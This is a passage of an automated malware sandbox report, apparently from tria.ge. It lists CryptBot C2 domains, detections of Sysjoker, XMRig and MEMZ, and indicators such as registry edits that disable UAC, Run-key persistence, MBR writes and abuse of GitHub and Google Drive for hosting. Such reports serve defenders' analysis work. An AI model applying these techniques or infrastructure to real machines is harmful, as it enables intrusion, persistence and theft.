Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
686s -
max time network
686s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 02:55
Static task
static1
URLScan task
urlscan1
Errors
General
Malware Config
Extracted
cryptbot
nkoopw11.top
moraass08.top
Signatures
-
CryptBot payload 3 IoCs
resource yara_rule behavioral1/memory/452-989-0x0000000000400000-0x00000000004A3000-memory.dmp family_cryptbot behavioral1/memory/452-990-0x0000000000400000-0x00000000004A3000-memory.dmp family_cryptbot behavioral1/memory/820-1015-0x0000000000400000-0x00000000004A3000-memory.dmp family_cryptbot -
Cryptbot family
-
Detection for the Linux version of Sysjoker cross-platform backdoor 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023e08-385.dat family_linux_sysjoker -
Detection for the macOS version of Sysjoker cross-platform backdoor 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023e08-385.dat family_macos_sysjoker -
Detection for the windows version of Sysjoker cross-platform backdoor 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023e08-385.dat family_sysjoker -
Modifies visibility of file extensions in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe -
Sysjoker family
-
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Xmrig family
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/5296-718-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-720-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-723-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-725-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-726-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-724-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-722-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5296-734-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5648-903-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-902-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-907-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-910-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-909-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-908-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-906-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/5648-914-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" certutil.exe -
Checks computer location settings 2 TTPs 25 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation etcmin.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation etcmin.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation igfxCUIService.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation igfxCUIService.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation xmrmine.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation xmrmine.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation serverpatch.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation igfxCUIService.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation nslookup.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation MEMZ.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation xmrmine.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation zqawds.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation MEMZ.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation etcmin.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation rtksmbs.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation igfxCUIService.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation nslookup.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation nslookup.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation nslookup.exe -
Executes dropped EXE 52 IoCs
pid Process 5160 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe 4124 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe 5748 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe 4928 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe 1760 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 4724 xmrmine.exe 220 etcmin.exe 5344 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 2632 etcmin.exe 1740 xmrmine.exe 4552 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 4044 xmrmine.exe 2560 etcmin.exe 5304 igfxCUIService.exe 4016 igfxCUIService.exe 4512 serverpatch.exe 4984 rtksmbs.exe 1484 igfxCUIService.exe 4800 igfxCUIService.exe 1952 sihost64.exe 4992 sihost32.exe 5016 c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe 916 zqawds.exe 2584 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe 2428 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe 5452 sihost64.exe 2492 msdtc.com 2512 msdtc.com 4076 msdtc.com 2836 lsm.com 4072 lsm.com 2596 lsm.com 452 nslookup.exe 820 nslookup.exe 3360 nslookup.exe 228 nslookup.exe 2756 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 5436 MEMZ.exe 920 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 4732 xmrmine.exe 1740 etcmin.exe 3680 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe 5776 uYQUIwYA.exe 3240 OmwEcoEM.exe 4368 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe 4168 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe 3360 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OmwEcoEM.exe = "C:\\ProgramData\\dkYkUUoU\\OmwEcoEM.exe" 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uYQUIwYA.exe = "C:\\Users\\Admin\\hSYcgEcU\\uYQUIwYA.exe" uYQUIwYA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OmwEcoEM.exe = "C:\\ProgramData\\dkYkUUoU\\OmwEcoEM.exe" OmwEcoEM.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\igfxCUIService = "C:\\ProgramData\\SystemData\\igfxCUIService.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\igfxCUIService = "C:\\ProgramData\\SystemData\\igfxCUIService.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\igfxCUIService = "C:\\ProgramData\\SystemData\\igfxCUIService.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\igfxCUIService = "C:\\ProgramData\\SystemData\\igfxCUIService.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uYQUIwYA.exe = "C:\\Users\\Admin\\hSYcgEcU\\uYQUIwYA.exe" 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 5248 certutil.exe 3304 certutil.exe 2380 certutil.exe 4468 certutil.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 29 IoCs
flow ioc 39 camo.githubusercontent.com 224 raw.githubusercontent.com 33 camo.githubusercontent.com 40 camo.githubusercontent.com 42 camo.githubusercontent.com 43 camo.githubusercontent.com 77 raw.githubusercontent.com 131 raw.githubusercontent.com 154 iplogger.org 156 iplogger.org 41 camo.githubusercontent.com 218 raw.githubusercontent.com 225 raw.githubusercontent.com 245 drive.google.com 150 raw.githubusercontent.com 247 drive.google.com 133 raw.githubusercontent.com 151 raw.githubusercontent.com 155 iplogger.org 211 raw.githubusercontent.com 257 drive.google.com 132 raw.githubusercontent.com 177 raw.githubusercontent.com 238 drive.google.com 44 camo.githubusercontent.com 181 raw.githubusercontent.com 192 raw.githubusercontent.com 239 drive.google.com 251 drive.google.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 MEMZ.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4512 set thread context of 5296 4512 serverpatch.exe 213 PID 916 set thread context of 5648 916 zqawds.exe 265 PID 2512 set thread context of 452 2512 msdtc.com 300 PID 4076 set thread context of 820 4076 msdtc.com 305 PID 4072 set thread context of 3360 4072 lsm.com 311 PID 2596 set thread context of 228 2596 lsm.com 312 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 6000 powershell.exe 4784 powershell.exe 5552 powershell.exe 1400 powershell.exe 1124 powershell.exe 1560 powershell.exe 2620 powershell.exe 1000 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdtc.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language igfxCUIService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certreq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certreq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language getmac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsm.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MEMZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language igfxCUIService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language getmac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2044 PING.EXE 5140 PING.EXE 2776 PING.EXE 1400 PING.EXE 3388 PING.EXE 4108 PING.EXE 5876 PING.EXE 3508 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000700000001e424-510.dat nsis_installer_1 behavioral1/files/0x000700000001e424-510.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslookup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nslookup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslookup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nslookup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslookup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nslookup.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3168 timeout.exe 6092 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 13 IoCs
pid Process 452 reg.exe 2000 reg.exe 4424 reg.exe 1584 reg.exe 4948 reg.exe 5452 reg.exe 5824 reg.exe 3100 reg.exe 3256 reg.exe 2924 reg.exe 540 reg.exe 5460 reg.exe 5160 reg.exe -
Runs ping.exe 1 TTPs 8 IoCs
pid Process 4108 PING.EXE 5876 PING.EXE 3508 PING.EXE 2044 PING.EXE 5140 PING.EXE 2776 PING.EXE 1400 PING.EXE 3388 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5616 schtasks.exe 4456 schtasks.exe 5224 schtasks.exe 3780 schtasks.exe 5064 schtasks.exe 5012 schtasks.exe 1348 schtasks.exe 2656 schtasks.exe 5768 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2992 msedge.exe 2992 msedge.exe 2036 msedge.exe 2036 msedge.exe 3372 identity_helper.exe 3372 identity_helper.exe 2332 msedge.exe 2332 msedge.exe 5884 msedge.exe 5884 msedge.exe 2180 msedge.exe 2180 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 2152 msedge.exe 2152 msedge.exe 5460 powershell.exe 5460 powershell.exe 5460 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 1840 powershell.exe 1840 powershell.exe 1840 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 4724 xmrmine.exe 220 etcmin.exe 220 etcmin.exe 4724 xmrmine.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 2632 etcmin.exe 2632 etcmin.exe 1740 xmrmine.exe 1740 xmrmine.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 4044 xmrmine.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5164 taskmgr.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2512 msdtc.com 4076 msdtc.com 4072 lsm.com 2596 lsm.com -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
pid Process 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 556 7zG.exe Token: 35 556 7zG.exe Token: SeSecurityPrivilege 556 7zG.exe Token: SeSecurityPrivilege 556 7zG.exe Token: SeRestorePrivilege 5828 7zG.exe Token: 35 5828 7zG.exe Token: SeSecurityPrivilege 5828 7zG.exe Token: SeSecurityPrivilege 5828 7zG.exe Token: SeDebugPrivilege 5460 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 5164 taskmgr.exe Token: SeSystemProfilePrivilege 5164 taskmgr.exe Token: SeCreateGlobalPrivilege 5164 taskmgr.exe Token: SeDebugPrivilege 4724 xmrmine.exe Token: SeDebugPrivilege 220 etcmin.exe Token: SeDebugPrivilege 2632 etcmin.exe Token: SeDebugPrivilege 1740 xmrmine.exe Token: SeDebugPrivilege 4044 xmrmine.exe Token: SeDebugPrivilege 2560 etcmin.exe Token: SeDebugPrivilege 4512 serverpatch.exe Token: SeDebugPrivilege 4984 rtksmbs.exe Token: SeLockMemoryPrivilege 5296 explorer.exe Token: SeLockMemoryPrivilege 5296 explorer.exe Token: SeRestorePrivilege 5964 7zG.exe Token: 35 5964 7zG.exe Token: SeSecurityPrivilege 5964 7zG.exe Token: SeSecurityPrivilege 5964 7zG.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeDebugPrivilege 5016 c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe Token: SeRestorePrivilege 3120 7zG.exe Token: 35 3120 7zG.exe Token: SeSecurityPrivilege 3120 7zG.exe Token: SeSecurityPrivilege 3120 7zG.exe Token: SeDebugPrivilege 2620 powershell.exe Token: SeIncreaseQuotaPrivilege 1692 WMIC.exe Token: SeSecurityPrivilege 1692 WMIC.exe Token: SeTakeOwnershipPrivilege 1692 WMIC.exe Token: SeLoadDriverPrivilege 1692 WMIC.exe Token: SeSystemProfilePrivilege 1692 WMIC.exe Token: SeSystemtimePrivilege 1692 WMIC.exe Token: SeProfSingleProcessPrivilege 1692 WMIC.exe Token: SeIncBasePriorityPrivilege 1692 WMIC.exe Token: SeCreatePagefilePrivilege 1692 WMIC.exe Token: SeBackupPrivilege 1692 WMIC.exe Token: SeRestorePrivilege 1692 